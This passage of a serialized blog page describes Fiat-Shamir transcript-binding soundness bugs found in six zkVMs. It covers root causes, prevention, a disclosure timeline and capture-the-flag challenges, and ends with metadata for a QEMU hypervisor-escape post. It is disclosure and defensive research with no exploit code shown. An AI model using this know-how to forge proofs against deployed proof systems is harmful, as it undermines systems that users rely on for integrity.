184],[],{"type":26,"tag":137,"props":125015,"children":125017},{"className":125016},[169],[125018,125023],{"type":26,"tag":137,"props":125019,"children":125021},{"className":125020,"style":621},[169,170],[125022],{"type":32,"value":624},{"type":26,"tag":137,"props":125024,"children":125026},{"className":125025},[236],[125027],{"type":26,"tag":137,"props":125028,"children":125030},{"className":125029},[241,417],[125031,125060],{"type":26,"tag":137,"props":125032,"children":125034},{"className":125033},[246],[125035,125055],{"type":26,"tag":137,"props":125036,"children":125038},{"className":125037,"style":556},[251],[125039],{"type":26,"tag":137,"props":125040,"children":125041},{"style":643},[125042,125046],{"type":26,"tag":137,"props":125043,"children":125045},{"className":125044,"style":262},[261],[],{"type":26,"tag":137,"props":125047,"children":125049},{"className":125048},[267,268,269,270],[125050],{"type":26,"tag":137,"props":125051,"children":125053},{"className":125052,"style":116838},[169,170,270],[125054],{"type":32,"value":11242},{"type":26,"tag":137,"props":125056,"children":125058},{"className":125057},[453],[125059],{"type":32,"value":456},{"type":26,"tag":137,"props":125061,"children":125063},{"className":125062},[246],[125064],{"type":26,"tag":137,"props":125065,"children":125067},{"className":125066,"style":121520},[251],[125068],{"type":26,"tag":137,"props":125069,"children":125070},{},[],{"type":26,"tag":137,"props":125072,"children":125074},{"className":125073},[197],[125075],{"type":32,"value":200},{"type":26,"tag":137,"props":125077,"children":125079},{"className":125078,"style":348},[184],[],{"type":26,"tag":137,"props":125081,"children":125083},{"className":125082},[353],[125084],{"type":32,"value":2172},{"type":26,"tag":137,"props":125086,"children":125088},{"className":125087,"style":348},[184],[],{"type":26,"tag":137,"props":125090,"children":125092},{"className":125091},[151],[125093,125097,125106,125111,125116,125121,125125,125135,125140,125149,125154,125163],{"type":26,"tag":137,"props":125094,"children":125096},{"className":125095,"style":95590},[156],[],{"type":26,"tag":137,"props":125098,"children":125100},{"className":125099},[169,32],[125101],{"type":26,"tag":137,"props":125102,"children":125104},{"className":125103},[169],[125105],{"type":32,"value":115207},{"type":26,"tag":137,"props":125107,"children":125109},{"className":125108},[162],[125110],{"type":32,"value":165},{"type":26,"tag":137,"props":125112,"children":125114},{"className":125113,"style":124888},[169,170],[125115],{"type":32,"value":52174},{"type":26,"tag":137,"props":125117,"children":125119},{"className":125118},[177],[125120],{"type":32,"value":180},{"type":26,"tag":137,"props":125122,"children":125124},{"className":125123,"style":185},[184],[],{"type":26,"tag":137,"props":125126,"children":125128},{"className":125127},[169,32],[125129],{"type":26,"tag":137,"props":125130,"children":125132},{"className":125131},[169],[125133],{"type":32,"value":125134},"inout",{"type":26,"tag":137,"props":125136,"children":125138},{"className":125137,"style":621},[169],[125139],{"type":32,"value":5666},{"type":26,"tag":137,"props":125141,"children":125143},{"className":125142},[169,32],[125144],{"type":26,"tag":137,"props":125145,"children":125147},{"className":125146},[169],[125148],{"type":32,"value":40144},{"type":26,"tag":137,"props":125150,"children":125152},{"className":125151,"style":621},[169],[125153],{"type":32,"value":5666},{"type":26,"tag":137,"props":125155,"children":125157},{"className":125156},[169,32],[125158],{"type":26,"tag":137,"props":125159,"children":125161},{"className":125160},[169],[125162],{"type":32,"value":120396},{"type":26,"tag":137,"props":125164,"children":125166},{"className":125165},[197],[125167],{"type":32,"value":200},{"type":26,"tag":35,"props":125169,"children":125170},{},[125171,125173,125178,125180,125253],{"type":32,"value":125172},"With challenges fixed (independent of ",{"type":26,"tag":130,"props":125174,"children":125176},{"className":125175},[],[125177],{"type":32,"value":64276},{"type":32,"value":125179},"), an attacker can find an alternate witness ",{"type":26,"tag":130,"props":125181,"children":125183},{"className":125182},[133,134],[125184],{"type":26,"tag":137,"props":125185,"children":125187},{"className":125186},[140],[125188],{"type":26,"tag":137,"props":125189,"children":125191},{"className":125190,"ariaHidden":146},[145],[125192],{"type":26,"tag":137,"props":125193,"children":125195},{"className":125194},[151],[125196,125201],{"type":26,"tag":137,"props":125197,"children":125200},{"className":125198,"style":125199},[156],"height:1.0307em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":125202,"children":125204},{"className":125203},[169],[125205,125214],{"type":26,"tag":137,"props":125206,"children":125208},{"className":125207},[169,32],[125209],{"type":26,"tag":137,"props":125210,"children":125212},{"className":125211},[169],[125213],{"type":32,"value":64276},{"type":26,"tag":137,"props":125215,"children":125217},{"className":125216},[236],[125218],{"type":26,"tag":137,"props":125219,"children":125221},{"className":125220},[241],[125222],{"type":26,"tag":137,"props":125223,"children":125225},{"className":125224},[246],[125226],{"type":26,"tag":137,"props":125227,"children":125230},{"className":125228,"style":125229},[251],"height:0.8362em;",[125231],{"type":26,"tag":137,"props":125232,"children":125234},{"style":125233},"top:-3.1473em;margin-right:0.05em;",[125235,125239],{"type":26,"tag":137,"props":125236,"children":125238},{"className":125237,"style":262},[261],[],{"type":26,"tag":137,"props":125240,"children":125242},{"className":125241},[267,268,269,270],[125243],{"type":26,"tag":137,"props":125244,"children":125246},{"className":125245},[169,270],[125247],{"type":26,"tag":137,"props":125248,"children":125250},{"className":125249},[169,270],[125251],{"type":32,"value":125252},"′",{"type":32,"value":125254}," that produces the same evaluation. This is a single 128-bit linear constraint over hundreds of bits, yielding a single linear equation in a high-dimensional binary witness space, which is typically underconstrained and admits many alternative witnesses under common parameterizations.",{"type":26,"tag":35,"props":125256,"children":125257},{},[125258,125262,125264],{"type":26,"tag":84,"props":125259,"children":125260},{},[125261],{"type":32,"value":119321},{"type":32,"value":125263}," Fixed on December 29, 2025 via ",{"type":26,"tag":41,"props":125265,"children":125268},{"href":125266,"rel":125267},"https://github.com/binius-zk/binius64/pull/1355/commits/86a515f0632d2acdf547ed82780dfe7f9f39358f",[45],[125269],{"type":32,"value":125270},"commit 86a515f",{"type":26,"tag":3265,"props":125272,"children":125273},{},[],{"type":26,"tag":92,"props":125275,"children":125277},{"id":125276},"why-does-this-keep-happening",[125278],{"type":32,"value":125279},"Why Does This Keep Happening?",{"type":26,"tag":35,"props":125281,"children":125282},{},[125283],{"type":32,"value":125284},"Given that we found the same bug class in six independent implementations, at some point we have to ask whether there is a systemic issue making this mistake so common.",{"type":26,"tag":118,"props":125286,"children":125288},{"id":125287},"academic-papers-dont-specify-fiat-shamir",[125289],{"type":32,"value":125290},"Academic Papers Don't Specify Fiat-Shamir",{"type":26,"tag":35,"props":125292,"children":125293},{},[125294,125296,125301,125303,125328,125330,125333,125335,125360,125362,125387],{"type":32,"value":125295},"Academic papers usually describe ",{"type":26,"tag":762,"props":125297,"children":125298},{},[125299],{"type":32,"value":125300},"interactive",{"type":32,"value":125302}," protocols: \"Prover sends ",{"type":26,"tag":130,"props":125304,"children":125306},{"className":125305},[133,134],[125307],{"type":26,"tag":137,"props":125308,"children":125310},{"className":125309},[140],[125311],{"type":26,"tag":137,"props":125312,"children":125314},{"className":125313,"ariaHidden":146},[145],[125315],{"type":26,"tag":137,"props":125316,"children":125318},{"className":125317},[151],[125319,125323],{"type":26,"tag":137,"props":125320,"children":125322},{"className":125321,"style":1512},[156],[],{"type":26,"tag":137,"props":125324,"children":125326},{"className":125325,"style":1843},[169,170],[125327],{"type":32,"value":118841},{"type":32,"value":125329},". Verifier sends",{"type":26,"tag":33563,"props":125331,"children":125332},{},[],{"type":32,"value":125334},"random ",{"type":26,"tag":130,"props":125336,"children":125338},{"className":125337},[133,134],[125339],{"type":26,"tag":137,"props":125340,"children":125342},{"className":125341},[140],[125343],{"type":26,"tag":137,"props":125344,"children":125346},{"className":125345,"ariaHidden":146},[145],[125347],{"type":26,"tag":137,"props":125348,"children":125350},{"className":125349},[151],[125351,125355],{"type":26,"tag":137,"props":125352,"children":125354},{"className":125353,"style":1542},[156],[],{"type":26,"tag":137,"props":125356,"children":125358},{"className":125357,"style":621},[169,170],[125359],{"type":32,"value":624},{"type":32,"value":125361},". Prover sends ",{"type":26,"tag":130,"props":125363,"children":125365},{"className":125364},[133,134],[125366],{"type":26,"tag":137,"props":125367,"children":125369},{"className":125368},[140],[125370],{"type":26,"tag":137,"props":125371,"children":125373},{"className":125372,"ariaHidden":146},[145],[125374],{"type":26,"tag":137,"props":125375,"children":125377},{"className":125376},[151],[125378,125382],{"type":26,"tag":137,"props":125379,"children":125381},{"className":125380,"style":1512},[156],[],{"type":26,"tag":137,"props":125383,"children":125385},{"className":125384,"style":1168},[169,170],[125386],{"type":32,"value":1171},{"type":32,"value":125388},".\"",{"type":26,"tag":35,"props":125390,"children":125391},{},[125392,125394,125419,125421,125446],{"type":32,"value":125393},"They often omit the necessary steps to make the protocol non-interactive: \"Hash ",{"type":26,"tag":130,"props":125395,"children":125397},{"className":125396},[133,134],[125398],{"type":26,"tag":137,"props":125399,"children":125401},{"className":125400},[140],[125402],{"type":26,"tag":137,"props":125403,"children":125405},{"className":125404,"ariaHidden":146},[145],[125406],{"type":26,"tag":137,"props":125407,"children":125409},{"className":125408},[151],[125410,125414],{"type":26,"tag":137,"props":125411,"children":125413},{"className":125412,"style":1512},[156],[],{"type":26,"tag":137,"props":125415,"children":125417},{"className":125416,"style":1843},[169,170],[125418],{"type":32,"value":118841},{"type":32,"value":125420}," before sampling ",{"type":26,"tag":130,"props":125422,"children":125424},{"className":125423},[133,134],[125425],{"type":26,"tag":137,"props":125426,"children":125428},{"className":125427},[140],[125429],{"type":26,"tag":137,"props":125430,"children":125432},{"className":125431,"ariaHidden":146},[145],[125433],{"type":26,"tag":137,"props":125434,"children":125436},{"className":125435},[151],[125437,125441],{"type":26,"tag":137,"props":125438,"children":125440},{"className":125439,"style":1542},[156],[],{"type":26,"tag":137,"props":125442,"children":125444},{"className":125443,"style":621},[169,170],[125445],{"type":32,"value":624},{"type":32,"value":125447},". Also hash the public statement. Also hash intermediate values that affect later equations.\"",{"type":26,"tag":35,"props":125449,"children":125450},{},[125451],{"type":32,"value":125452},"Security proofs thus also analyze the interactive protocols where binding is implicit. The responsibility of determining what to include in the transcript therefore falls on the implementor, which may not have a good understanding of the full protocol.",{"type":26,"tag":118,"props":125454,"children":125456},{"id":125455},"the-hot-potato-problem",[125457],{"type":32,"value":125458},"The Hot Potato Problem",{"type":26,"tag":35,"props":125460,"children":125461},{},[125462],{"type":32,"value":125463},"Modern zkVMs are modular:",{"type":26,"tag":35,"props":125465,"children":125466},{},[125467],{"type":26,"tag":2210,"props":125468,"children":125471},{"alt":125469,"src":125470},"11_hot_potato","/posts/zkvms-unfaithful-claims/11_hot_potato.svg",[],{"type":26,"tag":35,"props":125473,"children":125474},{},[125475],{"type":32,"value":125476},"It often happens that each layer assumes the previous/next layer handles the transcript binding for a value, so in the end it never happens.",{"type":26,"tag":118,"props":125478,"children":125480},{"id":125479},"optimization-pressure",[125481],{"type":32,"value":125482},"Optimization Pressure",{"type":26,"tag":35,"props":125484,"children":125485},{},[125486],{"type":32,"value":125487},"Performance is existential for ZK. Since every hash operation has a cost, there is constant pressure to exclude values that are \"probably fine\" to leave out.",{"type":26,"tag":35,"props":125489,"children":125490},{},[125491],{"type":32,"value":125492},"There are indeed cases when this can be done safely, but determining what is safe requires a full understanding of all protocols involved, and the decision to exclude something should be double and triple checked by experts.",{"type":26,"tag":118,"props":125494,"children":125496},{"id":125495},"testing-doesnt-catch-adversarial-inputs",[125497],{"type":32,"value":125498},"Testing Doesn't Catch Adversarial Inputs",{"type":26,"tag":35,"props":125500,"children":125501},{},[125502],{"type":32,"value":125503},"Unit tests run the honest prover. Integration tests run the honest prover. Fuzzing only randomly perturbs values and has a very low probability of succeeding in fooling a verifier. Identifying Fiat-Shamir bugs requires thorough manual security analysis, and sometimes even that falls short.",{"type":26,"tag":3265,"props":125505,"children":125506},{},[],{"type":26,"tag":92,"props":125508,"children":125510},{"id":125509},"how-to-find-and-fix-these-bugs",[125511],{"type":32,"value":125512},"How to Find and Fix These Bugs",{"type":26,"tag":118,"props":125514,"children":125516},{"id":125515},"prevention",[125517],{"type":32,"value":125518},"Prevention",{"type":26,"tag":35,"props":125520,"children":125521},{},[125522],{"type":32,"value":125523},"Fiat-Shamir has long been a known source of soundness bugs, which has driven the development of primitives that make implementation less error-prone.",{"type":26,"tag":35,"props":125525,"children":125526},{},[125527],{"type":32,"value":125528},"One such tool is to merge the proof and transcript, to force all values that are sent by the prover to be automatically absorbed into the transcript.",{"type":26,"tag":35,"props":125530,"children":125531},{},[125532],{"type":32,"value":125533},"The prover holds a proof buffer which emulates the communication channel between prover and verifier. When a value is sent by the prover it is added to the proof buffer and automatically absorbed into the transcript. When the prover then needs to read a challenge from the verifier it simply squeezes from the current transcript.",{"type":26,"tag":35,"props":125535,"children":125536},{},[125537],{"type":32,"value":125538},"This can then be done in reverse for the verifier. It gradually reads values from the proof buffer and can thus sync the transcript state and derive the same challenges.",{"type":26,"tag":35,"props":125540,"children":125541},{},[125542],{"type":32,"value":125543},"Halo2 follows this pattern, and Binius is transcript-centric as well. But even with a merged proof/transcript, statement data (e.g., public inputs) must still be absorbed before sampling any challenges that govern equations depending on them—and as Binius demonstrates, even transcript-centric systems can miss this.",{"type":26,"tag":3265,"props":125545,"children":125546},{},[],{"type":26,"tag":92,"props":125548,"children":125550},{"id":125549},"responsible-disclosure-timeline",[125551],{"type":32,"value":125552},"Responsible Disclosure Timeline",{"type":26,"tag":3584,"props":125554,"children":125555},{},[125556,125581],{"type":26,"tag":3588,"props":125557,"children":125558},{},[125559],{"type":26,"tag":3592,"props":125560,"children":125561},{},[125562,125566,125571,125576],{"type":26,"tag":3596,"props":125563,"children":125564},{},[125565],{"type":32,"value":25788},{"type":26,"tag":3596,"props":125567,"children":125568},{},[125569],{"type":32,"value":125570},"Reported",{"type":26,"tag":3596,"props":125572,"children":125573},{},[125574],{"type":32,"value":125575},"Fixed",{"type":26,"tag":3596,"props":125577,"children":125578},{},[125579],{"type":32,"value":125580},"Response Time",{"type":26,"tag":3607,"props":125582,"children":125583},{},[125584,125606,125627,125647,125669,125690],{"type":26,"tag":3592,"props":125585,"children":125586},{},[125587,125591,125596,125601],{"type":26,"tag":3614,"props":125588,"children":125589},{},[125590],{"type":32,"value":110438},{"type":26,"tag":3614,"props":125592,"children":125593},{},[125594],{"type":32,"value":125595},"Sep 2025",{"type":26,"tag":3614,"props":125597,"children":125598},{},[125599],{"type":32,"value":125600},"Oct 3, 2025",{"type":26,"tag":3614,"props":125602,"children":125603},{},[125604],{"type":32,"value":125605},"\u003C1 week",{"type":26,"tag":3592,"props":125607,"children":125608},{},[125609,125613,125618,125623],{"type":26,"tag":3614,"props":125610,"children":125611},{},[125612],{"type":32,"value":110444},{"type":26,"tag":3614,"props":125614,"children":125615},{},[125616],{"type":32,"value":125617},"Oct 2025",{"type":26,"tag":3614,"props":125619,"children":125620},{},[125621],{"type":32,"value":125622},"Oct 24, 2025",{"type":26,"tag":3614,"props":125624,"children":125625},{},[125626],{"type":32,"value":125605},{"type":26,"tag":3592,"props":125628,"children":125629},{},[125630,125634,125638,125643],{"type":26,"tag":3614,"props":125631,"children":125632},{},[125633],{"type":32,"value":110450},{"type":26,"tag":3614,"props":125635,"children":125636},{},[125637],{"type":32,"value":125617},{"type":26,"tag":3614,"props":125639,"children":125640},{},[125641],{"type":32,"value":125642},"Oct 31, 2025",{"type":26,"tag":3614,"props":125644,"children":125645},{},[125646],{"type":32,"value":125605},{"type":26,"tag":3592,"props":125648,"children":125649},{},[125650,125654,125659,125664],{"type":26,"tag":3614,"props":125651,"children":125652},{},[125653],{"type":32,"value":110456},{"type":26,"tag":3614,"props":125655,"children":125656},{},[125657],{"type":32,"value":125658},"Nov 2025",{"type":26,"tag":3614,"props":125660,"children":125661},{},[125662],{"type":32,"value":125663},"Mar 5, 2026",{"type":26,"tag":3614,"props":125665,"children":125666},{},[125667],{"type":32,"value":125668},"~4 months",{"type":26,"tag":3592,"props":125670,"children":125671},{},[125672,125676,125681,125686],{"type":26,"tag":3614,"props":125673,"children":125674},{},[125675],{"type":32,"value":110468},{"type":26,"tag":3614,"props":125677,"children":125678},{},[125679],{"type":32,"value":125680},"Dec 2025",{"type":26,"tag":3614,"props":125682,"children":125683},{},[125684],{"type":32,"value":125685},"Dec 29, 2025",{"type":26,"tag":3614,"props":125687,"children":125688},{},[125689],{"type":32,"value":125605},{"type":26,"tag":3592,"props":125691,"children":125692},{},[125693,125697,125701,125706],{"type":26,"tag":3614,"props":125694,"children":125695},{},[125696],{"type":32,"value":110462},{"type":26,"tag":3614,"props":125698,"children":125699},{},[125700],{"type":32,"value":125658},{"type":26,"tag":3614,"props":125702,"children":125703},{},[125704],{"type":32,"value":125705},"Jan 21, 2026?",{"type":26,"tag":3614,"props":125707,"children":125708},{},[125709],{"type":32,"value":125710},"3 months",{"type":26,"tag":35,"props":125712,"children":125713},{},[125714],{"type":32,"value":125715},"All six teams were notified; responses ranged from immediate acknowledgement to delayed fix, and all reported issues have since been addressed.",{"type":26,"tag":3265,"props":125717,"children":125718},{},[],{"type":26,"tag":92,"props":125720,"children":125722},{"id":125721},"challenges",[125723],{"type":32,"value":110481},{"type":26,"tag":35,"props":125725,"children":125726},{},[125727,125729],{"type":32,"value":125728},"Do you think you have a good understanding of these bugs? We have prepared challenges to allow you to practice implementing two of these exploits. If you solve any of them, follow the instructions in the flag ",{"type":26,"tag":125730,"props":125731,"children":125732},"del",{},[125733],{"type":32,"value":125734},"the first 10 solvers will get a T-shirt.",{"type":26,"tag":35,"props":125736,"children":125737},{},[125738,125740,125793,125794,126048],{"type":32,"value":125739},"Your goal is to find a counter example of Fermat's Last Theorem, i.e you know ",{"type":26,"tag":130,"props":125741,"children":125743},{"className":125742},[133,134],[125744],{"type":26,"tag":137,"props":125745,"children":125747},{"className":125746},[140],[125748],{"type":26,"tag":137,"props":125749,"children":125751},{"className":125750,"ariaHidden":146},[145],[125752],{"type":26,"tag":137,"props":125753,"children":125755},{"className":125754},[151],[125756,125760,125765,125770,125774,125779,125784,125788],{"type":26,"tag":137,"props":125757,"children":125759},{"className":125758,"style":3835},[156],[],{"type":26,"tag":137,"props":125761,"children":125763},{"className":125762},[169,170],[125764],{"type":32,"value":41},{"type":26,"tag":137,"props":125766,"children":125768},{"className":125767},[177],[125769],{"type":32,"value":180},{"type":26,"tag":137,"props":125771,"children":125773},{"className":125772,"style":185},[184],[],{"type":26,"tag":137,"props":125775,"children":125777},{"className":125776},[169,170],[125778],{"type":32,"value":2832},{"type":26,"tag":137,"props":125780,"children":125782},{"className":125781},[177],[125783],{"type":32,"value":180},{"type":26,"tag":137,"props":125785,"children":125787},{"className":125786,"style":185},[184],[],{"type":26,"tag":137,"props":125789,"children":125791},{"className":125790},[169,170],[125792],{"type":32,"value":4326},{"type":32,"value":112279},{"type":26,"tag":130,"props":125795,"children":125797},{"className":125796},[133,134],[125798],{"type":26,"tag":137,"props":125799,"children":125801},{"className":125800},[140],[125802],{"type":26,"tag":137,"props":125803,"children":125805},{"className":125804,"ariaHidden":146},[145],[125806,125868,125930,126035],{"type":26,"tag":137,"props":125807,"children":125809},{"className":125808},[151],[125810,125814,125855,125859,125864],{"type":26,"tag":137,"props":125811,"children":125813},{"className":125812,"style":301},[156],[],{"type":26,"tag":137,"props":125815,"children":125817},{"className":125816},[169],[125818,125823],{"type":26,"tag":137,"props":125819,"children":125821},{"className":125820},[169,170],[125822],{"type":32,"value":41},{"type":26,"tag":137,"props":125824,"children":125826},{"className":125825},[236],[125827],{"type":26,"tag":137,"props":125828,"children":125830},{"className":125829},[241],[125831],{"type":26,"tag":137,"props":125832,"children":125834},{"className":125833},[246],[125835],{"type":26,"tag":137,"props":125836,"children":125838},{"className":125837,"style":252},[251],[125839],{"type":26,"tag":137,"props":125840,"children":125841},{"style":256},[125842,125846],{"type":26,"tag":137,"props":125843,"children":125845},{"className":125844,"style":262},[261],[],{"type":26,"tag":137,"props":125847,"children":125849},{"className":125848},[267,268,269,270],[125850],{"type":26,"tag":137,"props":125851,"children":125853},{"className":125852},[169,270],[125854],{"type":32,"value":344},{"type":26,"tag":137,"props":125856,"children":125858},{"className":125857,"style":348},[184],[],{"type":26,"tag":137,"props":125860,"children":125862},{"className":125861},[353],[125863],{"type":32,"value":356},{"type":26,"tag":137,"props":125865,"children":125867},{"className":125866,"style":348},[184],[],{"type":26,"tag":137,"props":125869,"children":125871},{"className":125870},[151],[125872,125876,125917,125921,125926],{"type":26,"tag":137,"props":125873,"children":125875},{"className":125874,"style":252},[156],[],{"type":26,"tag":137,"props":125877,"children":125879},{"className":125878},[169],[125880,125885],{"type":26,"tag":137,"props":125881,"children":125883},{"className":125882},[169,170],[125884],{"type":32,"value":2832},{"type":26,"tag":137,"props":125886,"children":125888},{"className":125887},[236],[125889],{"type":26,"tag":137,"props":125890,"children":125892},{"className":125891},[241],[125893],{"type":26,"tag":137,"props":125894,"children":125896},{"className":125895},[246],[125897],{"type":26,"tag":137,"props":125898,"children":125900},{"className":125899,"style":252},[251],[125901],{"type":26,"tag":137,"props":125902,"children":125903},{"style":256},[125904,125908],{"type":26,"tag":137,"props":125905,"children":125907},{"className":125906,"style":262},[261],[],{"type":26,"tag":137,"props":125909,"children":125911},{"className":125910},[267,268,269,270],[125912],{"type":26,"tag":137,"props":125913,"children":125915},{"className":125914},[169,270],[125916],{"type":32,"value":344},{"type":26,"tag":137,"props":125918,"children":125920},{"className":125919,"style":281},[184],[],{"type":26,"tag":137,"props":125922,"children":125924},{"className":125923},[286],[125925],{"type":32,"value":289},{"type":26,"tag":137,"props":125927,"children":125929},{"className":125928,"style":281},[184],[],{"type":26,"tag":137,"props":125931,"children":125933},{"className":125932},[151],[125934,125938,125979,125984,125988,125993,125998,126002,126007,126012,126016,126021,126025,126031],{"type":26,"tag":137,"props":125935,"children":125937},{"className":125936,"style":222},[156],[],{"type":26,"tag":137,"props":125939,"children":125941},{"className":125940},[169],[125942,125947],{"type":26,"tag":137,"props":125943,"children":125945},{"className":125944},[169,170],[125946],{"type":32,"value":4326},{"type":26,"tag":137,"props":125948,"children":125950},{"className":125949},[236],[125951],{"type":26,"tag":137,"props":125952,"children":125954},{"className":125953},[241],[125955],{"type":26,"tag":137,"props":125956,"children":125958},{"className":125957},[246],[125959],{"type":26,"tag":137,"props":125960,"children":125962},{"className":125961,"style":252},[251],[125963],{"type":26,"tag":137,"props":125964,"children":125965},{"style":256},[125966,125970],{"type":26,"tag":137,"props":125967,"children":125969},{"className":125968,"style":262},[261],[],{"type":26,"tag":137,"props":125971,"children":125973},{"className":125972},[267,268,269,270],[125974],{"type":26,"tag":137,"props":125975,"children":125977},{"className":125976},[169,270],[125978],{"type":32,"value":344},{"type":26,"tag":137,"props":125980,"children":125982},{"className":125981},[177],[125983],{"type":32,"value":180},{"type":26,"tag":137,"props":125985,"children":125987},{"className":125986,"style":185},[184],[],{"type":26,"tag":137,"props":125989,"children":125991},{"className":125990},[169,170],[125992],{"type":32,"value":41},{"type":26,"tag":137,"props":125994,"children":125996},{"className":125995},[177],[125997],{"type":32,"value":180},{"type":26,"tag":137,"props":125999,"children":126001},{"className":126000,"style":185},[184],[],{"type":26,"tag":137,"props":126003,"children":126005},{"className":126004},[169,170],[126006],{"type":32,"value":2832},{"type":26,"tag":137,"props":126008,"children":126010},{"className":126009},[177],[126011],{"type":32,"value":180},{"type":26,"tag":137,"props":126013,"children":126015},{"className":126014,"style":185},[184],[],{"type":26,"tag":137,"props":126017,"children":126019},{"className":126018},[169,170],[126020],{"type":32,"value":4326},{"type":26,"tag":137,"props":126022,"children":126024},{"className":126023,"style":281},[184],[],{"type":26,"tag":137,"props":126026,"children":126028},{"className":126027},[286],[126029],{"type":32,"value":126030},"≥",{"type":26,"tag":137,"props":126032,"children":126034},{"className":126033,"style":281},[184],[],{"type":26,"tag":137,"props":126036,"children":126038},{"className":126037},[151],[126039,126043],{"type":26,"tag":137,"props":126040,"children":126042},{"className":126041,"style":368},[156],[],{"type":26,"tag":137,"props":126044,"children":126046},{"className":126045},[169],[126047],{"type":32,"value":878},{"type":32,"value":126049},". Good luck!",{"type":26,"tag":118,"props":126051,"children":126053},{"id":126052},"jolt",[126054],{"type":32,"value":110438},{"type":26,"tag":35,"props":126056,"children":126057},{},[126058,126060,126071,126073],{"type":32,"value":126059},"See ",{"type":26,"tag":41,"props":126061,"children":126068},{"href":126062,"target":126063,"rel":126064,"download":126067},"/posts/zkvms-unfaithful-claims/handout_jolt.tar.gz","_blank",[126065,126066],"noopener","noreferrer","handout_jolt.tar.gz",[126069],{"type":32,"value":126070},"the handout",{"type":32,"value":126072}," for the setup running on the server.\nSubmit your proof by connecting to ",{"type":26,"tag":130,"props":126074,"children":126076},{"className":126075},[],[126077],{"type":32,"value":126078},"jolt.chal.osec.io:8960",{"type":26,"tag":118,"props":126080,"children":126082},{"id":126081},"nexus-1",[126083],{"type":32,"value":110444},{"type":26,"tag":35,"props":126085,"children":126086},{},[126087,126088,126095,126096],{"type":32,"value":126059},{"type":26,"tag":41,"props":126089,"children":126093},{"href":126090,"target":126063,"rel":126091,"download":126092},"/posts/zkvms-unfaithful-claims/handout_nexus.tar.gz",[126065,126066],"handout_nexus.tar.gz",[126094],{"type":32,"value":126070},{"type":32,"value":126072},{"type":26,"tag":130,"props":126097,"children":126099},{"className":126098},[],[126100],{"type":32,"value":126101},"nexus.chal.osec.io:8950",{"type":26,"tag":35,"props":126103,"children":126104},{},[126105],{"type":32,"value":126106},"Now you should have enough margin to prove Fermat wrong.",{"type":26,"tag":3265,"props":126108,"children":126109},{},[],{"type":26,"tag":92,"props":126111,"children":126113},{"id":126112},"takeaways",[126114],{"type":32,"value":126115},"Takeaways",{"type":26,"tag":35,"props":126117,"children":126118},{},[126119],{"type":32,"value":126120},"We found critical soundness vulnerabilities in six separate zkVMs. All share the same root cause: prover-controlled values that affect verification equations were not bound to the Fiat-Shamir transcript before challenges were derived.",{"type":26,"tag":35,"props":126122,"children":126123},{},[126124],{"type":32,"value":126125},"The fix in each case is trivial—one or two lines of code. But finding the bug requires understanding the full verification flow and asking: \"What if the prover chose this value after seeing the challenges?\"",{"type":26,"tag":35,"props":126127,"children":126128},{},[126129,126134],{"type":26,"tag":84,"props":126130,"children":126131},{},[126132],{"type":32,"value":126133},"For the ZK ecosystem:",{"type":32,"value":126135}," The Fiat-Shamir transform looks simple. Hash everything, derive challenges. In practice, \"everything\" is hard to specify when you have dozens of components, each with its own inputs and outputs, each expecting someone else to handle binding.",{"type":26,"tag":35,"props":126137,"children":126138},{},[126139],{"type":32,"value":126140},"We found six instances by examining a handful of systems. How many more exist in the dozens of zkVMs, proof systems, and recursive verifiers deployed today?",{"type":26,"tag":35,"props":126142,"children":126143},{},[126144,126149],{"type":26,"tag":84,"props":126145,"children":126146},{},[126147],{"type":32,"value":126148},"For auditors:",{"type":32,"value":126150}," Draw the data flow. Trace the transcript. Check every prover-controlled value against when its relevant challenges are derived.",{"type":26,"tag":35,"props":126152,"children":126153},{},[126154,126159],{"type":26,"tag":84,"props":126155,"children":126156},{},[126157],{"type":32,"value":126158},"For builders:",{"type":32,"value":126160}," Treat the transcript as a sacred ledger. When in doubt, absorb it.",{"type":26,"tag":7949,"props":126162,"children":126163},{},[126164],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":126166},[126167,126168,126171,126177,126178,126186,126192,126195,126196,126200],{"id":110489,"depth":5412,"text":110492},{"id":110631,"depth":5412,"text":110634,"children":126169},[126170],{"id":110637,"depth":5417,"text":110640},{"id":111066,"depth":5412,"text":111069,"children":126172},[126173,126174,126175,126176],{"id":111077,"depth":5417,"text":111080},{"id":111265,"depth":5417,"text":111268},{"id":114639,"depth":5417,"text":114642},{"id":115853,"depth":5417,"text":115856},{"id":117487,"depth":5412,"text":117490},{"id":117990,"depth":5412,"text":117993,"children":126179},[126180,126181,126182,126183,126184,126185],{"id":118012,"depth":5417,"text":118015},{"id":119336,"depth":5417,"text":110444},{"id":120472,"depth":5417,"text":120475},{"id":121139,"depth":5417,"text":121142},{"id":123795,"depth":5417,"text":123798},{"id":124349,"depth":5417,"text":110468},{"id":125276,"depth":5412,"text":125279,"children":126187},[126188,126189,126190,126191],{"id":125287,"depth":5417,"text":125290},{"id":125455,"depth":5417,"text":125458},{"id":125479,"depth":5417,"text":125482},{"id":125495,"depth":5417,"text":125498},{"id":125509,"depth":5412,"text":125512,"children":126193},[126194],{"id":125515,"depth":5417,"text":125518},{"id":125549,"depth":5412,"text":125552},{"id":125721,"depth":5412,"text":110481,"children":126197},[126198,126199],{"id":126052,"depth":5417,"text":110438},{"id":126081,"depth":5417,"text":110444},{"id":126112,"depth":5412,"text":126115},"content:blog:2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims",{"_path":126205,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":126206,"description":126207,"date":126208,"author":126209,"image":126210,"isFeatured":18,"onBlogPage":18,"tags":126212,"body":126215,"_type":5433,"_id":134537,"_source":5435,"_file":134538,"_stem":134539,"_extension":5438},"/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape","From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow","Turning an uncontrolled heap overflow into a reliable QEMU guest-to-host escape using new glibc allocator behavior and QEMU-specific heap spray 